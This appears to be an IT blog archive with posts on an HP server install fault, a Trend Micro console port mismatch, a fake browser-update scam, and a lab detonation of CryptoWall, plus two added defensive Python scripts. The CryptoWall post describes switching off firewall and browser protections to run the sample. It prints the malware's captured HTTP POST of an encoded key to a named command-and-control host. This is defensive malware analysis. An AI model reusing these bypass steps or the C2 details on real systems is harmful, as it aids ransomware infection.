Archive for category IT
The failure happens about 45 minutes into the install so each new attempt takes ages to get to the point of failure.
After 5 or 6 hours of messing about, we called on HP. After their attempts to remote in via iLO and their own firmware checks (and under-the-hood checks) it was still not installing Windows.
They spent days on it. Finally, we decided to call time on this adventure. We had wasted too much time. We insisted it must be the mainboard.
The HP tech turned up and started his own tests. He also found that it was a driver fault and, after digging, worked out that the Broadcom network driver was halting everything.
After another 5 or so hours, he finally replaced the motherboard. Now it is all fixed.
His conclusion is that the older firmware on the mainboard (Intelligent Provisioning version 1.15) was more accepting of the Broadcom card and allowed everything to work.
So, if anyone strikes this same issue, here are my conclusions:
1) Call the HP Carepack team sooner rather than later. They are paid to fix these things and have the resources.
2) Newer firmware does not mean better.
3) Get HP to do as much of the work as possible whilst it is under Carepack, as this cost us dearly.
I can't get into the antivirus or antispam settings, and the agent appears to be offline?
This console normally opens up http://ExchangeServer:16372/smex/cgiDispatcher.exe?Page=scan/Antispam.htm&Locale=&CurPage=
My first step was to telnet to the Exchange server on port 16372, and it did not answer.
As SMEX runs from within a web server (in my case IIS), I looked at the default website and it was not running on port 16372. The port it was running on did not match the firewall rule either.
This means the SMEX service could not bind to the expected port when the service started, and as the port it did bind to matched neither the console URL nor the firewall rule, I had no hope of connecting to it.
I changed the port in IIS and the firewall rule, restarted the website and ... all fixed!
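The two failure modes in this post look identical from the browser but are distinguishable from a plain TCP probe: nothing bound on the port (the IIS site is listening elsewhere) gives an immediate connection refused, while a firewall rule that does not match the port silently drops the packets and the connect times out. The script below is an added example, not part of the original post, that runs that probe and pulls the expected port out of a console URL like the one above. The host names, the helper names and the local listener used in demo() are all constructed for illustration.

```python
"""Probe a management-console port and classify why it is unreachable.

Added example. Assumes the two failure modes described in the post:
  - IIS site bound to the wrong port  -> connect() is refused immediately
  - firewall rule on the wrong port   -> connect() times out (filtered)
"""
import socket
from urllib.parse import urlsplit


def console_port(url: str) -> int:
    """Extract the TCP port the console URL expects (default 80/443 if none given)."""
    parts = urlsplit(url)
    if parts.port is not None:
        return parts.port
    return 443 if parts.scheme == "https" else 80


def probe_port(host: str, port: int, timeout: float = 3.0) -> str:
    """Return 'open', 'refused', 'filtered' or 'error' for host:port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"            # something is listening and the firewall lets it through
    except ConnectionRefusedError:
        return "refused"         # reachable host, nothing bound on that port (check IIS bindings)
    except socket.timeout:
        return "filtered"        # no answer at all: firewall rule or routing (check the rule's port)
    except OSError:
        return "error"           # DNS failure, unreachable network, etc.
    finally:
        s.close()


def explain(result: str) -> str:
    """Map the probe result to the next thing to check."""
    return {
        "open": "port reachable; look at the web application itself",
        "refused": "nothing listening on that port; compare the IIS site binding with the console URL",
        "filtered": "connection dropped; compare the firewall rule's port with the console URL",
        "error": "host not resolvable or unreachable; fix name resolution or routing first",
    }[result]


def demo() -> tuple[str, str, int]:
    """Constructed self-test: one listening local port, one closed local port, one parsed URL."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    open_port = srv.getsockname()[1]
    # Find a port with nothing listening: bind, note the number, close it again.
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    try:
        return (
            probe_port("127.0.0.1", open_port),
            probe_port("127.0.0.1", closed_port),
            console_port("http://ExchangeServer:16372/smex/cgiDispatcher.exe?Page=scan/Antispam.htm"),
        )
    finally:
        srv.close()


if __name__ == "__main__":
    for r in demo()[:2]:
        print(r, "->", explain(r))
```

Run it from the workstation you normally open the console from, against the real host name and the port taken from the console URL; a "refused" result points at the IIS binding, a "filtered" result at the firewall rule, which is exactly the pair of mismatches this post fixed.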
The news is that some smart people have managed to obtain a copy of the database that contains all the victims' details. Now, instead of paying for decryption, you can get the decryption for free, self service.
Head on over to this article to read more: http://www.crn.com.au/News/390855,can-this-exploit-beat-cryptolocker.aspx
I don't think we have seen the end of these types of malware, but at least this proves that the malware writers are not invincible.
Being an IT guy, I know I already have the latest version. I also note that the URL is not a Microsoft URL. The terms have some odd bits in them.
For all the non-IT people out there ... use Windows Update. If you want to update your browser, find it on Microsoft's website and install it yourself. Don't follow prompts like this (no matter how convincing it looks).
So, this looks like Microsoft ... right?
You are currently browsing the web with Internet Explorer and your Video Player might be outdated Please update to the latest version for better performance
• Superior HD Video Streaming and Hardware Acceleration
• Download Any Movies, Shows or Video Clips
• Critical Security Patch and Bug Fixes
• Richer, more immersive user experiences
Note: This Update is Free and Takes Under a Minute on Broadband No Restart Required
Looks OK? I have never seen a browser update take less than a minute on most broadband. Since when does Microsoft support you downloading movies? Hmm, looks suspicious.
The URL also looks odd.
What's up with this section in the terms?
But no one reads the terms, do they? I noticed that nowhere does it mention Microsoft. It just talks about your browser.
The last line of the terms is also odd. The only place where you might make contact with the software maker has no hyperlinks or contact details:
If you would like to contact us via e-mail, please send a message here
So avoid this and don't be tricked.
Here are the full terms:
Think before you click!
No, I have a lab setup with a DMZ and loads of protection. I just need to download and run CryptoWall as my final step. My setup includes some sample data to encrypt, Wireshark for packet sniffing and Sysinternals Process Monitor.
So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc.) this is harder than I thought. I also had to dumb down my SonicWall firewall to let viruses through. The antivirus companies have been taking down the virus URLs faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.
So I had to bypass the built-in Internet Explorer protection (it also wanted to kill my download) and finally I have Document-128_712.zip. I extracted the contents: Document-128_712.scr with a PDF icon. I double-click the screensaver file (an executable in disguise) and the file vanishes. The mouse pointer changes to an hourglass for a second and then nothing. I refer to Wireshark and Process Monitor. They are blitzing past recording data.
There is nothing on the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double-click it again and again, as nothing appears to happen.
As this thing encrypts alphabetically, I wait until I start seeing the signs of encryption appearing in the hard drive sub-folders and then create a folder called "a", as in C:\a. It is safe, as the process does not seem to double back once it has passed a letter of the alphabet. A nice place to save logs etc. So, here come the screenshots. Some are from this current experiment, some from an actual infection.
So here is the .scr file, renamed to bd99547.exe. It is the same file as Document-128_712.scr, as the hashes are the same. It is in the Startup group, so if you restart your PC, it continues to encrypt.
Now, showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.
So I let this thing continue on and do its job. The exe file in the Start Menu Startup folder and on C:\ will vanish later. I watch as Process Monitor shows me the "exe" file I ran using Windows' built-in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft has already provided everything it needs. It is using Microsoft's own tools to hold us to ransom.
I watch it connect to 126.96.36.199 and do an HTTP POST. This server is called babyslutsnil.com
POST /da2c5yzx438 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)

z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16

HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT

<title>500 Internal Privoxy Error</title>
<link rel="shortcut icon" href="http://config.privoxy.org/error-favicon.ico" type="image/x-icon"></head>
<h1>500 Internal Privoxy Error</h1>
<p>Privoxy encountered an error while processing your request:</p>
<p><b>Could not load template file <code>forwarding-failed</code> or one of its included components.</b></p>
<p>Please contact your proxy administrator.</p>
<p>If you are the proxy administrator, please put the required file(s) in the <code><i>(confdir)</i>/templates</code> directory. The location of the <code><i>(confdir)</i></code> directory is specified in the main Privoxy <code>config</code> file. (It's typically the Privoxy install directory, or <code>/etc/privoxy/</code>).</p>
I can only assume it is trying to send out the RSA encryption key to the remote server.
Then you start seeing the encrypted files in folders, with additional files alongside them (DECRYPT_INSTRUCTION).
Then you find a key in the registry which starts off the same as the exe file name.
And then the exe files start to vanish and are replaced with the warnings you will see at the next reboot.
Then you get invited to go up, pay some money, download another exe file (do you trust it?) with the decryption, and away you go!
It uses the Tor network for the website, so there is no way to track these guys. They are anonymous and invisible.
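Two of the observations in this post translate directly into cheap defensive checks: because the encryptor walks folders alphabetically, files that sort first are touched before any real data and so make good tripwires; and because it drops a DECRYPT_INSTRUCTION file into every folder it has processed, the spread of an infection can be mapped by sweeping for that file name. The script below is an added example and not code from the original post. It assumes only what the post reports (alphabetical traversal, DECRYPT_INSTRUCTION files); the canary file names, the folder layout in demo() and the "simulated encryptor" that overwrites a canary are constructed for the demonstration.

```python
"""Canary-file tripwire and ransom-note sweep based on the behaviour described in the post.

Added example. Assumptions (from the post): the encryptor processes files in
alphabetical order and leaves DECRYPT_INSTRUCTION* files in each folder it hits.
"""
import hashlib
import os
import tempfile
from pathlib import Path

RANSOM_NOTE_PREFIX = "DECRYPT_INSTRUCTION"   # file name observed in the post


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large canaries do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def plant_canaries(root: Path, count: int = 3) -> dict[str, str]:
    """Create decoy files whose names sort before any real document ('!' precedes letters
    and digits), so an alphabetical encryptor reaches them first. Returns path -> sha256."""
    baseline = {}
    for i in range(count):
        p = root / f"!canary_{i:02d}.docx"        # constructed name; pick whatever blends in
        p.write_bytes(b"CANARY %d - do not edit\n" % i)
        baseline[str(p)] = sha256_of(p)
    return baseline


def check_canaries(baseline: dict[str, str]) -> list[str]:
    """Return the canaries that are missing or whose content no longer matches the baseline.
    A non-empty result is the signal to pull the network cable and alert."""
    tripped = []
    for path, digest in baseline.items():
        p = Path(path)
        if not p.exists() or sha256_of(p) != digest:
            tripped.append(path)
    return tripped


def sweep_ransom_notes(root: Path) -> list[str]:
    """Walk a tree and list every directory that holds a DECRYPT_INSTRUCTION* file,
    i.e. the folders the encryptor has already been through."""
    hit_dirs = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if any(name.upper().startswith(RANSOM_NOTE_PREFIX) for name in filenames):
            hit_dirs.append(dirpath)
    return sorted(hit_dirs)


def demo() -> tuple[list[str], list[str]]:
    """Constructed scenario in a temp directory: plant canaries, then simulate the
    encryptor overwriting the first one and dropping notes in two folders."""
    root = Path(tempfile.mkdtemp())
    baseline = plant_canaries(root)
    # --- simulated infection (no real malware; just the on-disk side effects) ---
    first_canary = sorted(baseline)[0]
    Path(first_canary).write_bytes(b"\x00\x00not the original bytes\x00")
    (root / "docs").mkdir()
    (root / "docs" / "DECRYPT_INSTRUCTION.TXT").write_text("constructed note")
    (root / "DECRYPT_INSTRUCTION.HTML").write_text("constructed note")
    return check_canaries(baseline), sweep_ransom_notes(root)


if __name__ == "__main__":
    tripped, hit = demo()
    print("tripped canaries:", tripped)
    print("folders with ransom notes:", hit)
```

In practice you would plant the canaries in the shares and user folders that matter, store the baseline hashes somewhere the workstation cannot write to, and run check_canaries from a scheduled task every minute or so; the sweep is the post-incident step that tells you which folders to restore from backup or Volume Shadow Copy.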
Now the trick is to get these files and screenshots from "C:\a" onto my USB key, as when I plug it in, the files get encrypted.
Final step: FORMAT THE MACHINE. My packet sniffs and process monitoring have shown me that this malware gets all over your PC.
Don't fix it, reformat it. You can recover files from backups or Volume Shadow Copy, but the underlying OS is now owned by some remote hacker. Don't dice with death!
Moral: Have current, offline backups!